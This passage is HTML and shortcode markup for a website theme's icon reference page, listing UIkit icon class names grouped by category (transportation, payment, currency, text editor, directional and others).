icon-question</li>\r\n    <li><i class=\"uk-icon-question-circle\"></i> icon-question-circle</li>\r\n    <li><i class=\"uk-icon-quote-left\"></i> icon-quote-left</li>\r\n    <li><i class=\"uk-icon-quote-right\"></i> icon-quote-right</li>\r\n    <li><i class=\"uk-icon-random\"></i> icon-random</li>\r\n    <li><i class=\"uk-icon-recycle\"></i> icon-recycle</li>\r\n    <li><i class=\"uk-icon-refresh\"></i> icon-refresh</li>\r\n    <li><i class=\"uk-icon-registered\"></i> icon-registered</li>\r\n    <li><i class=\"uk-icon-remove\"></i> icon-remove <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-reorder\"></i> icon-reorder <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-reply\"></i> icon-reply</li>\r\n    <li><i class=\"uk-icon-reply-all\"></i> icon-reply-all</li>\r\n    <li><i class=\"uk-icon-retweet\"></i> icon-retweet</li>\r\n    <li><i class=\"uk-icon-road\"></i> icon-road</li>\r\n    <li><i class=\"uk-icon-rocket\"></i> icon-rocket</li>\r\n    <li><i class=\"uk-icon-rss\"></i> icon-rss</li>\r\n    <li><i class=\"uk-icon-rss-square\"></i> icon-rss-square</li>\r\n    <li><i class=\"uk-icon-search\"></i> icon-search</li>\r\n    <li><i class=\"uk-icon-search-minus\"></i> icon-search-minus</li>\r\n    <li><i class=\"uk-icon-search-plus\"></i> icon-search-plus</li>\r\n    <li><i class=\"uk-icon-send\"></i> icon-send <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-send-o\"></i> icon-send-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-server\"></i> icon-server</li>\r\n    <li><i class=\"uk-icon-share\"></i> icon-share</li>\r\n    <li><i class=\"uk-icon-share-alt\"></i> icon-share-alt</li>\r\n    <li><i class=\"uk-icon-share-alt-square\"></i> icon-share-alt-square</li>\r\n    <li><i class=\"uk-icon-share-square\"></i> icon-share-square</li>\r\n    <li><i class=\"uk-icon-share-square-o\"></i> icon-share-square-o</li>\r\n    <li><i class=\"uk-icon-shield\"></i> icon-shield</li>\r\n    <li><i class=\"uk-icon-ship\"></i> icon-ship</li>\r\n    <li><i class=\"uk-icon-shopping-cart\"></i> icon-shopping-cart</li>\r\n    <li><i class=\"uk-icon-sign-in\"></i> icon-sign-in</li>\r\n    <li><i class=\"uk-icon-sign-out\"></i> icon-sign-out</li>\r\n    <li><i class=\"uk-icon-signal\"></i> icon-signal</li>\r\n    <li><i class=\"uk-icon-sitemap\"></i> icon-sitemap</li>\r\n    <li><i class=\"uk-icon-sliders\"></i> icon-sliders</li>\r\n    <li><i class=\"uk-icon-smile-o\"></i> icon-smile-o</li>\r\n    <li><i class=\"uk-icon-soccer-ball-o\"></i> icon-soccer-ball-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-sort\"></i> icon-sort</li>\r\n    <li><i class=\"uk-icon-sort-alpha-asc\"></i> icon-sort-alpha-asc</li>\r\n    <li><i class=\"uk-icon-sort-alpha-desc\"></i> icon-sort-alpha-desc</li>\r\n    <li><i class=\"uk-icon-sort-amount-asc\"></i> icon-sort-amount-asc</li>\r\n    <li><i class=\"uk-icon-sort-amount-desc\"></i> icon-sort-amount-desc</li>\r\n    <li><i class=\"uk-icon-sort-asc\"></i> icon-sort-asc</li>\r\n    <li><i class=\"uk-icon-sort-desc\"></i> icon-sort-desc</li>\r\n    <li><i class=\"uk-icon-sort-down\"></i> icon-sort-down <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-sort-numeric-asc\"></i> icon-sort-numeric-asc</li>\r\n    <li><i class=\"uk-icon-sort-numeric-desc\"></i> icon-sort-numeric-desc</li>\r\n    <li><i class=\"uk-icon-sort-up\"></i> icon-sort-up <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-space-shuttle\"></i> icon-space-shuttle</li>\r\n    <li><i class=\"uk-icon-spinner\"></i> icon-spinner</li>\r\n    <li><i class=\"uk-icon-spoon\"></i> icon-spoon</li>\r\n    <li><i class=\"uk-icon-square\"></i> icon-square</li>\r\n    <li><i class=\"uk-icon-square-o\"></i> icon-square-o</li>\r\n    <li><i class=\"uk-icon-star\"></i> icon-star</li>\r\n    <li><i class=\"uk-icon-star-half\"></i> icon-star-half</li>\r\n    <li><i class=\"uk-icon-star-half-empty\"></i> icon-star-half-empty <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-star-half-full\"></i> icon-star-half-full <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-star-half-o\"></i> icon-star-half-o</li>\r\n    <li><i class=\"uk-icon-star-o\"></i> icon-star-o</li>\r\n    <li><i class=\"uk-icon-sticky-note\"></i> icon-sticky-note</li>\r\n    <li><i class=\"uk-icon-sticky-note-o\"></i> icon-sticky-note-o</li>\r\n    <li><i class=\"uk-icon-street-view\"></i> icon-street-view</li>\r\n    <li><i class=\"uk-icon-suitcase\"></i> icon-suitcase</li>\r\n    <li><i class=\"uk-icon-sun-o\"></i> icon-sun-o</li>\r\n    <li><i class=\"uk-icon-support\"></i> icon-support <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-tablet\"></i> icon-tablet</li>\r\n    <li><i class=\"uk-icon-tachometer\"></i> icon-tachometer</li>\r\n    <li><i class=\"uk-icon-tag\"></i> icon-tag</li>\r\n    <li><i class=\"uk-icon-tags\"></i> icon-tags</li>\r\n    <li><i class=\"uk-icon-tasks\"></i> icon-tasks</li>\r\n    <li><i class=\"uk-icon-taxi\"></i> icon-taxi</li>\r\n    <li><i class=\"uk-icon-television\"></i> icon-television</li>\r\n    <li><i class=\"uk-icon-terminal\"></i> icon-terminal</li>\r\n    <li><i class=\"uk-icon-thumb-tack\"></i> icon-thumb-tack</li>\r\n    <li><i class=\"uk-icon-thumbs-down\"></i> icon-thumbs-down</li>\r\n    <li><i class=\"uk-icon-thumbs-o-down\"></i> icon-thumbs-o-down</li>\r\n    <li><i class=\"uk-icon-thumbs-o-up\"></i> icon-thumbs-o-up</li>\r\n    <li><i class=\"uk-icon-thumbs-up\"></i> icon-thumbs-up</li>\r\n    <li><i class=\"uk-icon-ticket\"></i> icon-ticket</li>\r\n    <li><i class=\"uk-icon-times\"></i> icon-times</li>\r\n    <li><i class=\"uk-icon-times-circle\"></i> icon-times-circle</li>\r\n    <li><i class=\"uk-icon-times-circle-o\"></i> icon-times-circle-o</li>\r\n    <li><i class=\"uk-icon-tint\"></i> icon-tint</li>\r\n    <li><i class=\"uk-icon-toggle-down\"></i> icon-toggle-down <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-left\"></i> icon-toggle-left <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-off\"></i> icon-toggle-off</li>\r\n    <li><i class=\"uk-icon-toggle-on\"></i> icon-toggle-on</li>\r\n    <li><i class=\"uk-icon-toggle-right\"></i> icon-toggle-right <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-up\"></i> icon-toggle-up <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-trademark\"></i> icon-trademark</li>\r\n    <li><i class=\"uk-icon-trash\"></i> icon-trash</li>\r\n    <li><i class=\"uk-icon-trash-o\"></i> icon-trash-o</li>\r\n    <li><i class=\"uk-icon-tree\"></i> icon-tree</li>\r\n    <li><i class=\"uk-icon-trophy\"></i> icon-trophy</li>\r\n    <li><i class=\"uk-icon-truck\"></i> icon-truck</li>\r\n    <li><i class=\"uk-icon-tty\"></i> icon-tty</li>\r\n    <li><i class=\"uk-icon-tv\"></i> icon-tv <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-umbrella\"></i> icon-umbrella</li>\r\n    <li><i class=\"uk-icon-university\"></i> icon-university</li>\r\n    <li><i class=\"uk-icon-unlock\"></i> icon-unlock</li>\r\n    <li><i class=\"uk-icon-unlock-alt\"></i> icon-unlock-alt</li>\r\n    <li><i class=\"uk-icon-unsorted\"></i> icon-unsorted <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-upload\"></i> icon-upload</li>\r\n    <li><i class=\"uk-icon-user\"></i> icon-user</li>\r\n    <li><i class=\"uk-icon-user-plus\"></i> icon-user-plus</li>\r\n    <li><i class=\"uk-icon-user-secret\"></i> icon-user-secret</li>\r\n    <li><i class=\"uk-icon-user-times\"></i> icon-user-times</li>\r\n    <li><i class=\"uk-icon-users\"></i> icon-users</li>\r\n    <li><i class=\"uk-icon-video-camera\"></i> icon-video-camera</li>\r\n    <li><i class=\"uk-icon-volume-down\"></i> icon-volume-down</li>\r\n    <li><i class=\"uk-icon-volume-off\"></i> icon-volume-off</li>\r\n    <li><i class=\"uk-icon-volume-up\"></i> icon-volume-up</li>\r\n    <li><i class=\"uk-icon-warning\"></i> icon-warning <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-wheelchair\"></i> icon-wheelchair</li>\r\n    <li><i class=\"uk-icon-wifi\"></i> icon-wifi</li>\r\n    <li><i class=\"uk-icon-wrench\"></i> icon-wrench</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Transportation Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-ambulance\"></i> icon-ambulance</li>\r\n    <li><i class=\"uk-icon-automobile\"></i> icon-automobile <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-bicycle\"></i> icon-bicycle</li>\r\n    <li><i class=\"uk-icon-bus\"></i> icon-bus</li>\r\n    <li><i class=\"uk-icon-cab\"></i> icon-cab <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-car\"></i> icon-car</li>\r\n    <li><i class=\"uk-icon-fighter-jet\"></i> icon-fighter-jet</li>\r\n    <li><i class=\"uk-icon-motorcycle\"></i> icon-motorcycle</li>\r\n    <li><i class=\"uk-icon-plane\"></i> icon-plane</li>\r\n    <li><i class=\"uk-icon-rocket\"></i> icon-rocket</li>\r\n    <li><i class=\"uk-icon-ship\"></i> icon-ship</li>\r\n    <li><i class=\"uk-icon-space-shuttle\"></i> icon-space-shuttle</li>\r\n    <li><i class=\"uk-icon-subway\"></i> icon-subway</li>\r\n    <li><i class=\"uk-icon-taxi\"></i> icon-taxi</li>\r\n    <li><i class=\"uk-icon-train\"></i> icon-train</li>\r\n    <li><i class=\"uk-icon-truck\"></i> icon-truck</li>\r\n    <li><i class=\"uk-icon-wheelchair\"></i> icon-wheelchair</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Hand Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-hand-lizard-o\"></i> icon-hand-lizard-o</li>\r\n    <li><i class=\"uk-icon-hand-stop-o\"></i> icon-hand-stop-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hand-paper-o\"></i> icon-hand-paper-o</li>\r\n    <li><i class=\"uk-icon-hand-peace-o\"></i> icon-hand-peace-o</li>\r\n    <li><i class=\"uk-icon-hand-pointer-o\"></i> icon-hand-pointer-o</li>\r\n    <li><i class=\"uk-icon-hand-grab-o\"></i> icon-hand-grab-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hand-rock-o\"></i> icon-hand-rock-o</li>\r\n    <li><i class=\"uk-icon-hand-scissors-o\"></i> icon-hand-scissors-o</li>\r\n    <li><i class=\"uk-icon-hand-spock-o\"></i> icon-hand-spock-o</li>\r\n    <li><i class=\"uk-icon-thumb-tack\"></i> icon-thumb-tack</li>\r\n    <li><i class=\"uk-icon-thumbs-down\"></i> icon-thumbs-down</li>\r\n    <li><i class=\"uk-icon-thumbs-o-down\"></i> icon-thumbs-o-down</li>\r\n    <li><i class=\"uk-icon-thumbs-o-up\"></i> icon-thumbs-o-up</li>\r\n    <li><i class=\"uk-icon-thumbs-up\"></i> icon-thumbs-up</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Gender Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-genderless\"></i> icon-genderless <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-mars\"></i> icon-mars</li>\r\n    <li><i class=\"uk-icon-mars-double\"></i> icon-mars-double</li>\r\n    <li><i class=\"uk-icon-mars-stroke\"></i> icon-mars-stroke</li>\r\n    <li><i class=\"uk-icon-mars-stroke-h\"></i> icon-mars-stroke-h</li>\r\n    <li><i class=\"uk-icon-mars-stroke-v\"></i> icon-mars-stroke-v</li>\r\n    <li><i class=\"uk-icon-mercury\"></i> icon-mercury</li>\r\n    <li><i class=\"uk-icon-neuter\"></i> icon-neuter</li>\r\n    <li><i class=\"uk-icon-transgender\"></i> icon-transgender</li>\r\n    <li><i class=\"uk-icon-transgender-alt\"></i> icon-transgender-alt</li>\r\n    <li><i class=\"uk-icon-venus\"></i> icon-venus</li>\r\n    <li><i class=\"uk-icon-venus-double\"></i> icon-venus-double</li>\r\n    <li><i class=\"uk-icon-venus-mars\"></i> icon-venus-mars</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]File Type Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-file\"></i> icon-file</li>\r\n    <li><i class=\"uk-icon-file-archive-o\"></i> icon-file-archive-o</li>\r\n    <li><i class=\"uk-icon-file-audio-o\"></i> icon-file-audio-o</li>\r\n    <li><i class=\"uk-icon-file-code-o\"></i> icon-file-code-o</li>\r\n    <li><i class=\"uk-icon-file-excel-o\"></i> icon-file-excel-o</li>\r\n    <li><i class=\"uk-icon-file-image-o\"></i> icon-file-image-o</li>\r\n    <li><i class=\"uk-icon-file-movie-o\"></i> icon-file-movie-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-o\"></i> icon-file-o</li>\r\n    <li><i class=\"uk-icon-file-pdf-o\"></i> icon-file-pdf-o</li>\r\n    <li><i class=\"uk-icon-file-photo-o\"></i> icon-file-photo-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-picture-o\"></i> icon-file-picture-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-powerpoint-o\"></i> icon-file-powerpoint-o</li>\r\n    <li><i class=\"uk-icon-file-sound-o\"></i> icon-file-sound-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-text\"></i> icon-file-text</li>\r\n    <li><i class=\"uk-icon-file-text-o\"></i> icon-file-text-o</li>\r\n    <li><i class=\"uk-icon-file-video-o\"></i> icon-file-video-o</li>\r\n    <li><i class=\"uk-icon-file-word-o\"></i> icon-file-word-o</li>\r\n    <li><i class=\"uk-icon-file-zip-o\"></i> icon-file-zip-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Spinner Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-circle-o-notch\"></i> icon-circle-o-notch</li>\r\n    <li><i class=\"uk-icon-cog\"></i> icon-cog</li>\r\n    <li><i class=\"uk-icon-gear\"></i> icon-gear <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-refresh\"></i> icon-refresh</li>\r\n    <li><i class=\"uk-icon-spinner\"></i> icon-spinner<li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Form Control Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-check-square\"></i> icon-check-square</li>\r\n    <li><i class=\"uk-icon-check-square-o\"></i> icon-check-square-o</li>\r\n    <li><i class=\"uk-icon-circle\"></i> icon-circle</li>\r\n    <li><i class=\"uk-icon-circle-o\"></i> icon-circle-o</li>\r\n    <li><i class=\"uk-icon-dot-circle-o\"></i> icon-dot-circle-o</li>\r\n    <li><i class=\"uk-icon-minus-square\"></i> icon-minus-square</li>\r\n    <li><i class=\"uk-icon-minus-square-o\"></i> icon-minus-square-o</li>\r\n    <li><i class=\"uk-icon-plus-square\"></i> icon-plus-square</li>\r\n    <li><i class=\"uk-icon-plus-square-o\"></i> icon-plus-square-o</li>\r\n    <li><i class=\"uk-icon-square\"></i> icon-square</li>\r\n    <li><i class=\"uk-icon-square-o\"></i> icon-square-o</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Payment Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-cc-amex\"></i> icon-cc-amex</li>\r\n    <li><i class=\"uk-icon-cc-diners-club\"></i> icon-cc-diners-club</li>\r\n    <li><i class=\"uk-icon-cc-discover\"></i> icon-cc-discover</li>\r\n    <li><i class=\"uk-icon-cc-jcb\"></i> icon-cc-jcb</li>\r\n    <li><i class=\"uk-icon-cc-mastercard\"></i> icon-cc-mastercard</li>\r\n    <li><i class=\"uk-icon-cc-paypal\"></i> icon-cc-paypal</li>\r\n    <li><i class=\"uk-icon-cc-stripe\"></i> icon-cc-stripe</li>\r\n    <li><i class=\"uk-icon-cc-visa\"></i> icon-cc-visa</li>\r\n    <li><i class=\"uk-icon-credit-card\"></i> icon-credit-card</li>\r\n    <li><i class=\"uk-icon-google-wallet\"></i> icon-google-wallet</li>\r\n    <li><i class=\"uk-icon-paypal\"></i> icon-paypal</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Currency Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-bitcoin\"></i> icon-bitcoin <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-btc\"></i> icon-btc</li>\r\n    <li><i class=\"uk-icon-cny\"></i> icon-cny <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-dollar\"></i> icon-dollar <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-eur\"></i> icon-eur</li>\r\n    <li><i class=\"uk-icon-euro\"></i> icon-euro <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-gbp\"></i> icon-gbp</li>\r\n    <li><i class=\"uk-icon-ils\"></i> icon-ils</li>\r\n    <li><i class=\"uk-icon-inr\"></i> icon-inr</li>\r\n    <li><i class=\"uk-icon-jpy\"></i> icon-jpy</li>\r\n    <li><i class=\"uk-icon-krw\"></i> icon-krw</li>\r\n    <li><i class=\"uk-icon-money\"></i> icon-money</li>\r\n    <li><i class=\"uk-icon-rmb\"></i> icon-rmb <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-rouble\"></i> icon-rouble <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-rub\"></i> icon-rub</li>\r\n    <li><i class=\"uk-icon-ruble\"></i> icon-ruble <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-rupee\"></i> icon-rupee <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-shekel\"></i> icon-shekel <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-sheqel\"></i> icon-sheqel <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-try\"></i> icon-try</li>\r\n    <li><i class=\"uk-icon-turkish-lira\"></i> icon-turkish-lira <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-usd\"></i> icon-usd</li>\r\n    <li><i class=\"uk-icon-won\"></i> icon-won <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-yen\"></i> icon-yen <span class=\"uk-text-muted\">(alias)</span></li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Text Editor Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-align-center\"></i> icon-align-center</li>\r\n    <li><i class=\"uk-icon-align-justify\"></i> icon-align-justify</li>\r\n    <li><i class=\"uk-icon-align-left\"></i> icon-align-left</li>\r\n    <li><i class=\"uk-icon-align-right\"></i> icon-align-right</li>\r\n    <li><i class=\"uk-icon-bold\"></i> icon-bold</li>\r\n    <li><i class=\"uk-icon-chain\"></i> icon-chain <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-chain-broken\"></i> icon-chain-broken</li>\r\n    <li><i class=\"uk-icon-clipboard\"></i> icon-clipboard</li>\r\n    <li><i class=\"uk-icon-columns\"></i> icon-columns</li>\r\n    <li><i class=\"uk-icon-copy\"></i> icon-copy <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-cut\"></i> icon-cut <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-dedent\"></i> icon-dedent <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-eraser\"></i> icon-eraser</li>\r\n    <li><i class=\"uk-icon-file\"></i> icon-file</li>\r\n    <li><i class=\"uk-icon-file-o\"></i> icon-file-o</li>\r\n    <li><i class=\"uk-icon-file-text\"></i> icon-file-text</li>\r\n    <li><i class=\"uk-icon-file-text-o\"></i> icon-file-text-o</li>\r\n    <li><i class=\"uk-icon-files-o\"></i> icon-files-o</li>\r\n    <li><i class=\"uk-icon-floppy-o\"></i> icon-floppy-o</li>\r\n    <li><i class=\"uk-icon-font\"></i> icon-font</li>\r\n    <li><i class=\"uk-icon-header\"></i> icon-header</li>\r\n    <li><i class=\"uk-icon-indent\"></i> icon-indent</li>\r\n    <li><i class=\"uk-icon-italic\"></i> icon-italic</li>\r\n    <li><i class=\"uk-icon-link\"></i> icon-link</li>\r\n    <li><i class=\"uk-icon-list\"></i> icon-list</li>\r\n    <li><i class=\"uk-icon-list-alt\"></i> icon-list-alt</li>\r\n    <li><i class=\"uk-icon-list-ol\"></i> icon-list-ol</li>\r\n    <li><i class=\"uk-icon-list-ul\"></i> icon-list-ul</li>\r\n    <li><i class=\"uk-icon-outdent\"></i> icon-outdent</li>\r\n    <li><i class=\"uk-icon-paperclip\"></i> icon-paperclip</li>\r\n    <li><i class=\"uk-icon-paragraph\"></i> icon-paragraph</li>\r\n    <li><i class=\"uk-icon-paste\"></i> icon-paste <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-repeat\"></i> icon-repeat</li>\r\n    <li><i class=\"uk-icon-rotate-left\"></i> icon-rotate-left <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-rotate-right\"></i> icon-rotate-right <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-save\"></i> icon-save <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-scissors\"></i> icon-scissors</li>\r\n    <li><i class=\"uk-icon-strikethrough\"></i> icon-strikethrough</li>\r\n    <li><i class=\"uk-icon-subscript\"></i> icon-subscript</li>\r\n    <li><i class=\"uk-icon-superscript\"></i> icon-superscript</li>\r\n    <li><i class=\"uk-icon-table\"></i> icon-table</li>\r\n    <li><i class=\"uk-icon-text-height\"></i> icon-text-height</li>\r\n    <li><i class=\"uk-icon-text-width\"></i> icon-text-width</li>\r\n    <li><i class=\"uk-icon-th\"></i> icon-th</li>\r\n    <li><i class=\"uk-icon-th-large\"></i> icon-th-large</li>\r\n    <li><i class=\"uk-icon-th-list\"></i> icon-th-list</li>\r\n    <li><i class=\"uk-icon-underline\"></i> icon-underline</li>\r\n    <li><i class=\"uk-icon-undo\"></i> icon-undo</li>\r\n    <li><i class=\"uk-icon-unlink\"></i> icon-unlink <span class=\"uk-text-muted\">(alias)</span></li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Directional Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-angle-double-down\"></i> icon-angle-double-down</li>\r\n    <li><i class=\"uk-icon-angle-double-left\"></i> icon-angle-double-left</li>\r\n    <li><i class=\"uk-icon-angle-double-right\"></i> icon-angle-double-right</li>\r\n    <li><i class=\"uk-icon-angle-double-up\"></i> icon-angle-double-up</li>\r\n    <li><i class=\"uk-icon-angle-down\"></i> icon-angle-down</li>\r\n    <li><i class=\"uk-icon-angle-left\"></i> icon-angle-left</li>\r\n    <li><i class=\"uk-icon-angle-right\"></i> icon-angle-right</li>\r\n    <li><i class=\"uk-icon-angle-up\"></i> icon-angle-up</li>\r\n    <li><i class=\"uk-icon-arrow-circle-down\"></i> icon-arrow-circle-down</li>\r\n    <li><i class=\"uk-icon-arrow-circle-left\"></i> icon-arrow-circle-left</li>\r\n    <li><i class=\"uk-icon-arrow-circle-o-down\"></i> icon-arrow-circle-o-down</li>\r\n    <li><i class=\"uk-icon-arrow-circle-o-left\"></i> icon-arrow-circle-o-left</li>\r\n    <li><i class=\"uk-icon-arrow-circle-o-right\"></i> icon-arrow-circle-o-right</li>\r\n    <li><i class=\"uk-icon-arrow-circle-o-up\"></i> icon-arrow-circle-o-up</li>\r\n    <li><i class=\"uk-icon-arrow-circle-right\"></i> icon-arrow-circle-right</li>\r\n    <li><i class=\"uk-icon-arrow-circle-up\"></i> icon-arrow-circle-up</li>\r\n    <li><i class=\"uk-icon-arrow-down\"></i> icon-arrow-down</li>\r\n    <li><i class=\"uk-icon-arrow-left\"></i> icon-arrow-left</li>\r\n    <li><i class=\"uk-icon-arrow-right\"></i> icon-arrow-right</li>\r\n    <li><i class=\"uk-icon-arrow-up\"></i> icon-arrow-up</li>\r\n    <li><i class=\"uk-icon-arrows\"></i> icon-arrows</li>\r\n    <li><i class=\"uk-icon-arrows-alt\"></i> icon-arrows-alt</li>\r\n    <li><i class=\"uk-icon-arrows-h\"></i> icon-arrows-h</li>\r\n    <li><i class=\"uk-icon-arrows-v\"></i> icon-arrows-v</li>\r\n    <li><i class=\"uk-icon-caret-down\"></i> icon-caret-down</li>\r\n    <li><i class=\"uk-icon-caret-left\"></i> icon-caret-left</li>\r\n    <li><i class=\"uk-icon-caret-right\"></i> icon-caret-right</li>\r\n    <li><i class=\"uk-icon-caret-square-o-down\"></i> icon-caret-square-o-down</li>\r\n    <li><i class=\"uk-icon-caret-square-o-left\"></i> icon-caret-square-o-left</li>\r\n    <li><i class=\"uk-icon-caret-square-o-right\"></i> icon-caret-square-o-right</li>\r\n    <li><i class=\"uk-icon-caret-square-o-up\"></i> icon-caret-square-o-up</li>\r\n    <li><i class=\"uk-icon-caret-up\"></i> icon-caret-up</li>\r\n    <li><i class=\"uk-icon-chevron-circle-down\"></i> icon-chevron-circle-down</li>\r\n    <li><i class=\"uk-icon-chevron-circle-left\"></i> icon-chevron-circle-left</li>\r\n    <li><i class=\"uk-icon-chevron-circle-right\"></i> icon-chevron-circle-right</li>\r\n    <li><i class=\"uk-icon-chevron-circle-up\"></i> icon-chevron-circle-up</li>\r\n    <li><i class=\"uk-icon-chevron-down\"></i> icon-chevron-down</li>\r\n    <li><i class=\"uk-icon-chevron-left\"></i> icon-chevron-left</li>\r\n    <li><i class=\"uk-icon-chevron-right\"></i> icon-chevron-right</li>\r\n    <li><i class=\"uk-icon-chevron-up\"></i> icon-chevron-up</li>\r\n    <li><i class=\"uk-icon-hand-o-down\"></i> icon-hand-o-down</li>\r\n    <li><i class=\"uk-icon-hand-o-left\"></i> icon-hand-o-left</li>\r\n    <li><i class=\"uk-icon-hand-o-right\"></i> icon-hand-o-right</li>\r\n    <li><i class=\"uk-icon-hand-o-up\"></i> icon-hand-o-up</li>\r\n    <li><i class=\"uk-icon-long-arrow-down\"></i> icon-long-arrow-down</li>\r\n    <li><i class=\"uk-icon-long-arrow-left\"></i> icon-long-arrow-left</li>\r\n    <li><i 